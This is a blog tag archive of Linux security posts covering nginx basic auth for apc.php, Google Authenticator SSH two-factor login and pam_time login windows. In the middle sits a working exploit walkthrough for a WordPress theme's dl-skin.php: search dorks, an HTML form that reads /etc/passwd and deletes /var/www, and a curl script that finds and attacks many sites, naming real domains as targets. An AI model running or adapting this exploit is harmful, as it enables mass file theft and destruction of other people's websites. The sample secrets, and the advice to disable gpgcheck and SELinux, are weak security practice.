Tag Archive: Security


HTTP Authentication for APC

There are times when you need apc.php to clear the APC cache: either you write code to clear the cache, or you view the cache contents via the browser.

You can protect it with HTTP Basic Auth so that it cannot be viewed by third parties.

Here we are using Nginx as the front-end and PHP-FPM as the back-end.

Assuming APC has already been installed,

locate the apc.php file on the server and copy it to the desired location.

Consider a scenario: abc.com.au has apc.php at public_html/cache/apc.php.

Below is the Nginx configuration that protects the apc.php file; it belongs in the vhost file of the domain abc.com.au:

location ^~ /cache {
    auth_basic "Admin";
    auth_basic_user_file /var/www/html/htpasswd;

    location ~ \.php$ {
        fastcgi_pass 127.0.0.1:9002;
        fastcgi_index index.php;
        fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
        include /etc/nginx/fastcgi_params;
    }
}

  • htpasswd -b -c /var/www/html/htpasswd test1 g009fdr

where test1 is the username and g009fdr is the password.

  • rename apc.php to index.php
  • vi index.php and make the changes shown below,

  • service nginx restart
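The location block above is only as strong as the hashes in the htpasswd file it points at. As an added check (not part of the original post), this Python script classifies the hash format of each htpasswd entry and flags the weak ones; the entries are constructed samples, and the {SHA} one is built from the page's sample password.

```python
import base64
import hashlib
import hmac
import re

def sha_entry(user, password):
    """Build a '{SHA}' htpasswd entry (unsalted SHA-1, the format 'htpasswd -s' writes)."""
    digest = hashlib.sha1(password.encode()).digest()
    return "%s:{SHA}%s" % (user, base64.b64encode(digest).decode())

# Constructed htpasswd contents: one entry per hash format seen in the wild.
SAMPLE_HTPASSWD = "\n".join([
    sha_entry("test1", "g009fdr"),                # sample user/password from this page
    "ops:$apr1$Ke3zP0q9$5v4q7ZiqXQzAjLbfj6Vdr1",   # constructed apr1 (salted MD5) hash
    "legacy:ab1yY3Gd9PcsU",                       # constructed 13-char crypt(3) hash
    "oops:plaintextpw",                           # password stored unhashed
])

CRYPT_RE = re.compile(r"[A-Za-z0-9./]{13}")

def hash_kind(field):
    """Classify the hash format of one htpasswd password field."""
    if field.startswith("$apr1$"):
        return "apr1-md5"
    if field.startswith(("$2y$", "$2a$", "$2b$")):
        return "bcrypt"
    if field.startswith("{SHA}"):
        return "sha1-unsalted"
    if CRYPT_RE.fullmatch(field):
        return "crypt"            # truncates passwords to 8 characters
    return "plaintext"

def audit(text):
    """Return {user: (kind, is_weak)}; crypt, unsalted SHA-1 and plaintext are flagged weak."""
    weak = {"crypt", "sha1-unsalted", "plaintext"}
    result = {}
    for line in text.splitlines():
        if not line or line.startswith("#") or ":" not in line:
            continue
        user, field = line.split(":", 1)
        kind = hash_kind(field)
        result[user] = (kind, kind in weak)
    return result

def check_sha(field, password):
    """Verify a candidate password against a '{SHA}' field with a constant-time compare."""
    digest = base64.b64encode(hashlib.sha1(password.encode()).digest()).decode()
    return hmac.compare_digest(field[len("{SHA}"):], digest)

if __name__ == "__main__":
    for user, (kind, is_weak) in audit(SAMPLE_HTPASSWD).items():
        print("%-8s %-14s %s" % (user, kind, "WEAK" if is_weak else "ok"))
```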

I don't know why developers around the globe are so much into copy-and-pasting code before actually checking things out manually.

This is just a standard example of how Security Admins/System Admins get screwed big time.

Tips for Security Admins:

  • Have proper checks and URL sanitization; block the IP of any request that targets OS files or files that can bring your server down.
  • Analyze logs; have an automated script that parses logs for malicious requests and IPs.
  • Keep yourself updated with the latest hacks and vulnerabilities.
  • Have an IDS for any newly installed application and check for any vulnerabilities associated with it.
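As an added example of the log-parsing tip (not from the original post): a Python detector that reads combined-format access log lines, flags requests to the theme script path named on this page or references to OS files in the query string, and tallies the source IPs as block-list candidates. The log lines are constructed samples.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Combined log format as nginx/apache write it; the sample lines below are constructed.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) \S+" '
                    r'(?P<status>\d{3}) \S+')

# The theme script and parameter names from this page, plus path prefixes that
# point at OS files a web request should never reference.
SUSPICIOUS_PATH = "/wp-content/themes/persuasion/lib/scripts/dl-skin.php"
SUSPICIOUS_PARAMS = ("_mysite_download_skin", "_mysite_delete_skin_zip")
OS_FILE_PREFIXES = ("/etc/", "/proc/", "/var/", "/root/")

SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2012:13:55:36 +0000] "POST /wp-content/themes/persuasion/lib/scripts/dl-skin.php HTTP/1.1" 200 1890
203.0.113.7 - - [10/Oct/2012:13:55:40 +0000] "GET /wp-content/themes/persuasion/lib/scripts/dl-skin.php?_mysite_download_skin=%2Fetc%2Fpasswd HTTP/1.1" 200 1890
198.51.100.2 - - [10/Oct/2012:13:56:01 +0000] "GET /index.php HTTP/1.1" 200 5120
198.51.100.9 - - [10/Oct/2012:13:57:12 +0000] "GET /download.php?file=/etc/shadow HTTP/1.1" 403 210
"""

def classify(line):
    """Return the reasons a log line looks malicious (empty list when it looks clean)."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparseable"]
    path, _, query = m.group("path").partition("?")
    query = unquote(query)          # also catches %2Fetc%2Fpasswd-style encoding
    reasons = []
    if path.endswith(SUSPICIOUS_PATH):
        reasons.append("vulnerable-script")
    if any(p + "=" in query for p in SUSPICIOUS_PARAMS):
        reasons.append("skin-parameter")
    if any(pref in query for pref in OS_FILE_PREFIXES):
        reasons.append("os-file-reference")
    return reasons

def scan(log_text):
    """Map each offending source IP to the set of reasons seen: the block-list candidates."""
    hits = defaultdict(set)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        reasons = classify(line)
        if reasons:
            hits[line.split(" ", 1)[0]].update(reasons)
    return dict(hits)

if __name__ == "__main__":
    for ip, reasons in sorted(scan(SAMPLE_LOG).items()):
        print(ip, sorted(reasons))
```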

Enough of consultancy!!!

How to exploit?

1. Google dork:

index:wp-content/themes/persuasion/lib/scripts/dl-skin.php

OR

inurl:wp-content/themes/persuasion/lib/scripts/

2. A test domain hosted on a server; mine was testing.com (NOT LIVE), behind TOR 😉

Add the exploit below under public_html, say as test.html:

<html>
<body>
<form action=”http://vulnerable-site.com/wp-content/themes/persuasion/lib/scripts/dl-skin.php&#8221; method=”post”>
Existing file’s name:<input type=”text” name=”_mysite_download_skin” value=”/etc/passwd”><br>
Directory to be removed:<input type=”text” name=”_mysite_delete_skin_zip” value=”/var/www”><font color=red>Use with caution it will delete the files and directories if it is writeable</font><br>
<input type=”submit”  name=press value=”OK”>
</form>
</body>
</html>

 

3. You'll find /etc/passwd downloaded; check /home/ and just delete it by specifying the path in the text box above.

4. Imagine it's coded and automated:

You can have something like this: create a function, say google, and search as shown below.

Command:

function google { Q=”$@”; GOOG_URL=’https://www.google.de/search?tbs=li:1&q=&#8217;; AGENT=”Mozilla/4.0″; stream=$(curl -A “$AGENT” -skLm 10 “${GOOG_URL}${Q//\ /+}” | grep -oP ‘\/url\?q=.+?&amp’ | sed ‘s|/url?q=||; s|&amp||’); echo -e “${stream//\%/\x}”; }

Sample Output:

[root@BT]# google inurl:wp-content/themes/persuasion/lib/scripts/ | sed ‘s/scripts.*$/scripts/’ | uniq
http://burlingtonventures.com/wp-content/themes/persuasion/lib/scripts
http://finseafood.com/wp-content/themes/persuasion/lib/scripts
http://www.bydelight.com/wp-content/themes/persuasion/lib/scripts
http://laforceteamwork.com/wp-content/themes/persuasion/lib/scripts
http://www.kismetdallas.com/wp-content/themes/persuasion/lib/scripts
[root@BT]#

Then you can use curl to check the HTTP status code of the above search results:

URL=`google inurl:wp-content/themes/persuasion/lib/scripts/ | sed ‘s/scripts.*$/scripts/’`

for STATUS in $URL
do
HTTP_STATUS_CODE=`curl -s -o /dev/null -I -w “%{http_code}” http://www.bydelight.com/wp-content/themes/persuasion/lib/scripts/dl-skin.php`

if [ “$HTTP_STATUS_CODE” == 200 ];

then

curl command to post data

else

echo “message”

fi

done

curl used together with formfind can be used to submit web forms, or use the command below:

[root@BT]# curl –data “_mysite_download_skin=%2Fetc%2Fpasswd&_mysite_delete_skin_zip=%2Fvar%2Fwww&press=%20OK%20” –dump-header headers http://www.testing.com/test.html

If you are unfamiliar with curl, you can use FireCurl to get the response of the curl command.

In no time, you’ll end up bringing down 2k+ websites.

Vulnerable Script: 

Cheers!!!!

CentOS 6.x with Python 2.6 and higher

Install Mercurial and pam-devel

Install Google Authenticator

Make the changes in the following config files for Google Authenticator to work:

  • vi /etc/pam.d/sshd

auth       [success=1 default=ignore]  pam_access.so accessfile=/etc/security/access-local.conf
auth       required                    pam_google_authenticator.so
auth       include                     password-auth

  • vi /etc/security/access-local.conf

+ : ALL : 96.x.x.x 122.x.x.x
+ : ALL : LOCAL
- : ALL : ALL

Save the file.

  • vi /etc/ssh/sshd_config

UsePAM yes
ChallengeResponseAuthentication yes

Installation is now done; run the google-authenticator command as shown below:

google-authenticator

https://www.google.com/chart?chs=200x200&chld=M|0&cht=qr&chl=otpauth://totp/user@server%3Fsecret%3DSAEP64T5VZAVWAFB
Your new secret key is: SAEP64T5VZAVWAFB
Your verification code is 376046
Your emergency scratch codes are:
67868696
26247332
54815527
54336661
71083816

Do you want me to update your "~/.google_authenticator" file (y/n) y

Do you want to disallow multiple uses of the same authentication
token? This restricts you to one login about every 30s, but it increases
your chances to notice or even prevent man-in-the-middle attacks (y/n) y

By default, tokens are good for 30 seconds and in order to compensate for
possible time-skew between the client and the server, we allow an extra
token before and after the current time. If you experience problems with poor
time synchronization, you can increase the window from its default
size of 1:30min to about 4min. Do you want to do so (y/n) n

If the computer that you are logging into isn’t hardened against brute-force
login attempts, you can enable rate-limiting for the authentication module.
By default, this limits attackers to no more than 3 login attempts every 30s.
Do you want to enable rate-limiting (y/n) y

  • vi /root/.google_authenticator and copy the contents below, overwriting the ones already present in the file

AW27V7FTT3WHWIUZ
" TIME_SKEW 10
" RESETTING_TIME_SKEW
" RATE_LIMIT 3 30 1343016196 1343016212
" DISALLOW_REUSE 44718971
" TOTP_AUTH
60096634
41809819
10524489
24780266
74238483

  • service sshd restart

PS: The series of questions above should be answered according to your needs and requirements.
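An added example (my own illustration in Python, not the PAM module's code) of the behaviour the prompts above describe: 30-second TOTP codes, one extra token of tolerated skew before and after the current one, and rejection of a token that is presented twice. It uses the sample secret printed by google-authenticator above; the timestamp is a constructed fixed value.

```python
import base64
import hashlib
import hmac
import struct
import time

SECRET_B32 = "SAEP64T5VZAVWAFB"   # sample secret from the google-authenticator output above
STEP = 30                         # token lifetime in seconds
WINDOW = 1                        # one extra token before and after (the 1:30 min default)

def totp(secret_b32, counter, digits=6):
    """RFC 6238 code for one 30-second counter value: HMAC-SHA1 plus dynamic truncation."""
    key = base64.b32decode(secret_b32.upper() + "=" * (-len(secret_b32) % 8))
    mac = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return "%0*d" % (digits, code % 10 ** digits)

class Verifier:
    """Illustrative re-implementation of the skew window and DISALLOW_REUSE checks."""

    def __init__(self, secret_b32, window=WINDOW):
        self.secret = secret_b32
        self.window = window
        self.used_counters = set()    # counters already accepted once

    def verify(self, code, now=None):
        """Accept a code if it matches any counter in the window and was not used before."""
        now = time.time() if now is None else now
        centre = int(now // STEP)
        for counter in range(centre - self.window, centre + self.window + 1):
            if hmac.compare_digest(totp(self.secret, counter), code):
                if counter in self.used_counters:
                    return False      # same token presented twice: rejected
                self.used_counters.add(counter)
                return True
        return False

if __name__ == "__main__":
    t = 1343016196                    # constructed fixed epoch time
    code = totp(SECRET_B32, t // STEP)
    v = Verifier(SECRET_B32)
    print(code, v.verify(code, t), v.verify(code, t))
```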

CentOS 5.x and Python version lower than 2.6

  • yum install git*
  • If a dependency fails, then -> yum install git --disableexcludes=main
  • If there is still an error for the repository, then create a repo file epel.repo under /etc/yum.repos.d/ and add the repository below

[epel]
name=Extra Packages for Enterprise Linux 5 - $basearch
#baseurl=http://download.fedoraproject.org/pub/epel/5/$basearch
mirrorlist=http://mirrors.fedoraproject.org/mirrorlist?repo=epel-5&arch=$basearch
failovermethod=priority
enabled=1
gpgcheck=1
gpgkey=file:///etc/pki/rpm-gpg/RPM-GPG-KEY-EPEL

[epel-debuginfo]
name=Extra Packages for Enterprise Linux 5 - $basearch - Debug
#baseurl=http://download.fedoraproject.org/pub/epel/5/$basearch/debug
mirrorlist=http://mirrors.fedoraproject.org/mirrorlist?repo=epel-debug-5&arch=$basearch
failovermethod=priority
enabled=0
gpgkey=file:///etc/pki/rpm-gpg/RPM-GPG-KEY-EPEL
gpgcheck=1

[epel-source]
name=Extra Packages for Enterprise Linux 5 - $basearch - Source
#baseurl=http://download.fedoraproject.org/pub/epel/5/SRPMS
mirrorlist=http://mirrors.fedoraproject.org/mirrorlist?repo=epel-source-5&arch=$basearch
failovermethod=priority
enabled=0
gpgkey=file:///etc/pki/rpm-gpg/RPM-GPG-KEY-EPEL
gpgcheck=1

You'll get an error saying "File does not exist file:///etc/pki/rpm-gpg/RPM-GPG-KEY-EPEL".

Just change gpgcheck from '1' to '0'.

Try yum install git* now. 😉

  • vi /etc/ssh/sshd_config

UsePAM yes
ChallengeResponseAuthentication yes

  • vi /etc/pam.d/sshd (NOTE: if you don't see password-auth inside /etc/pam.d/sshd, then use the following)

auth       [success=1 default=ignore]  pam_access.so accessfile=/etc/security/access-local.conf
auth       required                    pam_google_authenticator.so
auth       include                     system-auth

  • and you are good to go 🙂 🙂

Check your implementation

  • Log in to your Linux box from an IP specified in the access-local.conf file; it should not ask for a verification code.
  • Log in from a server outside that list; it will ask for a verification code.
  • If it doesn't work, make sure SELinux is disabled.
  • Also make sure the time is in sync.

**Note -> The above implementation will not ask for a verification code for IPs listed in /etc/security/access-local.conf; for all other IPs it will ask for a verification code.

Also, the secret key generated for a server resides in /root/.google_authenticator. If you have a bunch of servers, just copy the .google_authenticator file across all servers and set the key on your smartphones (iPhone, BlackBerry, iPad, etc.); the Google Authenticator application will then generate a verification code every 30 seconds.

Copying the key across all servers has the advantage of handling a single secret key for all servers; then every 3 months you can update the key and copy the updated key to all servers.

Let us know if any script is required for automation.

http://support.google.com/accounts/bin/answer.py?hl=en&answer=1066447

Sometimes we need to allow a user to access SSH only during a specific time interval.

For example: allow Mike to access the SSH service between 1:00 AM and 5:00 AM.

We can achieve this using the pam_time module. The pam_time module is an account module type. No arguments are passed directly to the module; instead, all configuration takes place within /etc/security/time.conf.

time.conf operates based on rules, and each rule uses the following syntax:

services;ttys;users;times

Steps to be followed:

  • SSH to the server and vi /etc/pam.d/sshd

cat /etc/pam.d/sshd
#%PAM-1.0
auth include system-auth
account required pam_time.so
account required pam_nologin.so
account include system-auth
password include system-auth
session optional pam_keyinit.so force revoke
session include system-auth

auth required pam_shells.so

The account required pam_time.so line is the one that must be added.

  • vi /etc/pam.d/system-auth

add "account     required      pam_time.so"

  • vi /etc/security/time.conf

sshd;*;mike;Wk0100-0500

  • Restart the sshd service

**Available abbreviations for the days of the week:

Mo : Monday
Tu : Tuesday
We : Wednesday
Th : Thursday
Fr : Friday
Sa : Saturday
Su : Sunday
Wd : Sa/Su
Wk : Mo/Tu/We/Th/Fr
Al : All Days
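As an added example (my own illustration, not the pam_time module's code), this Python evaluator parses time.conf rules in the services;ttys;users;times syntax above, expands the day abbreviations from the table, and decides whether a login at a given moment would be allowed. It is a simplified model: each of the first three fields supports '*', '!' negation and '|' alternatives, and the time field is a run of day abbreviations followed by one HHMM-HHMM range (which may wrap past midnight).

```python
from datetime import datetime
from fnmatch import fnmatchcase

# Day abbreviations from the table above, mapped to datetime.weekday() numbers
# (Monday = 0 ... Sunday = 6); Wd, Wk and Al expand to sets.
DAYS = {"Mo": {0}, "Tu": {1}, "We": {2}, "Th": {3}, "Fr": {4}, "Sa": {5}, "Su": {6},
        "Wd": {5, 6}, "Wk": {0, 1, 2, 3, 4}, "Al": set(range(7))}

def parse_rule(line):
    """Split 'services;ttys;users;times' into its four fields."""
    fields = line.strip().split(";")
    if len(fields) != 4:
        raise ValueError("rule needs exactly four ';'-separated fields: %r" % line)
    return tuple(f.strip() for f in fields)

def field_matches(field, value):
    """Match a services/ttys/users field: '*' is a wildcard, '!' negates, '|' separates alternatives."""
    if field == "*":
        return True
    negate = field.startswith("!")
    alts = field.lstrip("!").split("|")
    hit = any(fnmatchcase(value, alt) for alt in alts)
    return hit != negate

def time_matches(spec, when):
    """Match a 'Wk0100-0500'-style spec; 'HHMM-HHMM' is the last 9 characters."""
    days, rng = spec[:-9], spec[-9:]
    allowed_days = set()
    for i in range(0, len(days), 2):
        allowed_days |= DAYS[days[i:i + 2]]
    if when.weekday() not in allowed_days:
        return False
    start, end = (int(x) for x in rng.split("-"))
    now = when.hour * 100 + when.minute
    return start <= now < end if start <= end else now >= start or now < end

def allowed(rules, service, tty, user, when):
    """Simplified pam_time decision: every rule matching service/tty/user must also match the time."""
    for line in rules:
        svc, ttys, users, times = parse_rule(line)
        if field_matches(svc, service) and field_matches(ttys, tty) and field_matches(users, user):
            if not time_matches(times, when):
                return False
    return True

if __name__ == "__main__":
    rules = ["sshd;*;mike;Wk0100-0500"]     # the rule from the steps above
    print(allowed(rules, "sshd", "pts/0", "mike", datetime(2012, 7, 24, 2, 30)))   # Tuesday 02:30
    print(allowed(rules, "sshd", "pts/0", "mike", datetime(2012, 7, 28, 2, 30)))   # Saturday 02:30
```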